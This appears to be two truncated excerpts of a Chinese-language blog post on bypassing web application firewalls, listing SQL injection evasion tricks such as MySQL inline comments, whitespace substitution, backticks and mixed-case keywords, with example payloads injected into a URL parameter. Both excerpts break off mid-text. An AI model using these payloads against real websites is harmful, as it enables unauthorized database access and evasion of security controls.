2022年04月11日
文中中,小编与各位介绍了好多个WAF绕开的技巧。针对一些大家都掌握的技巧如:/*!*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM 不会再重造轮子。
Mysql:
tips1: 奇妙的 ` (格式输出表的那一个控制符)
过空格 过一些正则表达式。
mysql>select`version`() ->; ---------------------- |`version`()| ---------------------- |5.1.50-co
2022年04月11日
什么叫WAF?
Web运用防火墙是根据执行一系列对于HTTP/HTTPS的安全策略来专业为Web运用提供维护的一款商品。
基本上/简易绕过方式:
1、注释符
http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4….
2、应用大小写字母
http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4….
3、融合前边二